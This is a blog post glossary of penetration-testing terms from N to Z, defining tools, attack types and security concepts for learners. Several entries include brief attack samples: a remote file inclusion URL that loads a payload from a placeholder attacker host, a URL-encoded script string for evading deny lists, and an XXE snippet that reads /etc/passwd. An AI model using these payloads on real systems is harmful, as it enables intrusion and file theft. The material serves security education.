An A-Z of pentesting terms and abbreviations – Part 2

In this blog post, we continue our A-Z glossary of common pentesting abbreviations, acronyms and terms, from N-Z.

Get ready for the likes of OSINT, RFI, YubiKeys and more.

And don’t forget, you can catch up on any terms you missed in part one (A-M) here.

N – Nmap

One of the most well-known tools in penetration testing, Nmap can be used to identify hosts and the services that are running on them.

Using both the TCP and UDP protocol, Nmap is used by pentesters to enumerate an environment and they can then leverage the Nmap Scripting Engine (NSE) to perform some simple vulnerability scanning.

O – OSINT

OSINT, or Open Source Intelligence, is a method of using publicly available information to research a target. Search engines, social media, news articles or blog posts for example can all be used as part of an OSINT operation.

OSINT can be used in pentesting as a way of identifying persons of interest, or identifying hobbies or interests that could be exploited as part of a phishing campaign to trick a user.

P – Phishing

Phishing is a form of social engineering that uses emails as a method of tricking users into either taking an action or divulging information.

Common phishing techniques are to take on a persona of authority, or to use a premise that requires quick action, so that the potential victim does not have time to think through what they are doing.

Phishing has also been expanded into Vishing – Voice Phishing, Smishing – SMS Phishing and Quishing – QR Code Phishing.

Q – Quantum Computing

Quantum computing is a new type of computing that uses quantum bits (qubits) instead of traditional bits to perform calculations. Qubits can exist in multiple states at the same time, allowing quantum computers to perform multiple calculations simultaneously.

This makes quantum computing incredibly powerful, especially for solving complex problems, so it poses a potential challenge for the future of encryption, as quantum computers would be able to crack encryption keys quickly.

R – RFI

Remote File Inclusion (RFI) is a type of web vulnerability that allows an attacker to include a remote file, such as a script or code, into a vulnerable website. This can be used to execute malicious code on the target website.

A simple RFI example could look like this:

http://<URL>/index.php?page=http://<attacker_IP>/RFI.php

This will load and execute RFI.php payload on the vulnerable website

S – Social Engineering

Social engineering is the use of psychological manipulation to trick individuals into giving away information or performing an action.

Sometimes referred to as human hacking, social engineering takes advantage of human weaknesses instead of technical weaknesses. Common examples of social engineering can be phishing or smishing scams, where an email or text message appears to come from a trusted source or encourages a need for quick action.

Physical security assessments will also leverage some form of social engineering to allow an attacker to get into a building or access areas or information.

T – Tunneling

Tunneling is the concept of encapsulating network traffic in a different protocol and is commonly used to hide the content, or to bypass security controls. Familiar examples include:

VPN – a lot of VPNs use the IPsec protocol suite that runs directly on IP at the network layer. Traffic in an IPsec tunnel is fully encrypted and only decrypted once it reaches its destination.

SSH – on the other hand, SSH tunneling operates at the application layer and is used to tunnel network traffic through an SSH connection.

U – URL Encoding

URL encoding (like all encoding) is the process of converting a character set into a different format.

In URL encoding, special characters that are sent in a URL or the body of an HTTP request need to be converted into a URL encoded value. These values are displayed with a % followed by a two-digit hex value, for example < would be converted to %3c or / would be converted to %2f.

Understanding how to provide special characters to a web application can be very helpful when it comes to attempting to bypass deny lists, as well as many other actions.

This is because commands such as <script>alert(1)</script> and %3cscript%3ealert%281%29%3c%2fscript%3e are fundamentally the same from the perspective of a website.

This could help bypass incredibly trivial deny lists that are blocking users from supplying the key word <script>.

V – VLAN

A VLAN, or Virtual Local Area Network, is comprised of devices on several physical LANs that are configured to act as if they were on one LAN.

A VLAN is a logical, not a physical network, which allows more flexibility. It may also describe the implementation of network boundaries, aka segmentation.

In penetration testing, a keen understanding of VLANs is paramount. Pentesters can exploit misconfigurations or weak VLAN implementations, such as VLAN Hopping – a misconfiguration that allows you to move from one VLAN to another.

W – WPA/WPA2

WPA (or Wi-Fi Protected Access) and WPA2 (or Wi-Fi Protected Access 2) are security protocols used by wireless networks.

WPA was introduced to replace WEP (Wired Equivalent Privacy) which had a security issue whereby gathering IV packets could help an attacker obtain the Wi-Fi password.

WPA2 then replaced WPA and is now the most common protocol used by consumer level routers.

In personal mode, WPA2 uses PSK (Pre-Shared Key) where all users use the same password to connect to the network. WPA2-PSK uses a four-way handshake when a device connects to a network. Attackers can monitor Wi-Fi traffic for this handshake (or ‘deauth’ a device to trigger a handshake) and then use a dictionary attack to crack the password for the network.

A common tool used for wireless attacks such as this is the Aircrack-ng suite.

X – XXE

An XML External Entity (or XXE) attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

A simplified example XXE attack may look something like this:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///etc/passwd”>
<foo>&xxe;</foo>

This code would submit the legitimate foo request, but would also make a request for the passwd file.

Y – YubiKey

A YubiKey is a hardware authentication device that provides an extra layer of security for login credentials and access control.

In addition to generating one-time codes, YubiKeys can also be used to store digital certificates, which can be used for additional security purposes, such as encrypting email messages or authenticating to a VPN.

Z – Zero Day

A zero day (or 0-day) is used to describe a previously unknown vulnerability. These vulnerabilities, and the exploit code for them, can be incredibly valuable to APT groups.

0-days can be particularly dangerous, as there is no patch for them. Depending on the severity, the announcement of a new 0-day can put companies into overdrive to come up with a fix, which will then be followed by a patch.

Whilst it might feel like 0-days are only found by the elite, who spend all their time researching software to find flaws, it is entirely possible to find a 0-day in day-to-day pentesting, by exploring how a target system or software works, and working through your own methodology.

If a pentester discovers a 0-day during testing, it is ethical to adopt a responsible disclosure process. They should approach the vendor to make sure the issue can be fixed, after a patch has been produced. Hopefully, the vendor will then credit them with finding the issue, meaning they can publish their finding.

Missed out on A-M?  Click here to read An A-Z of pentesting – part one.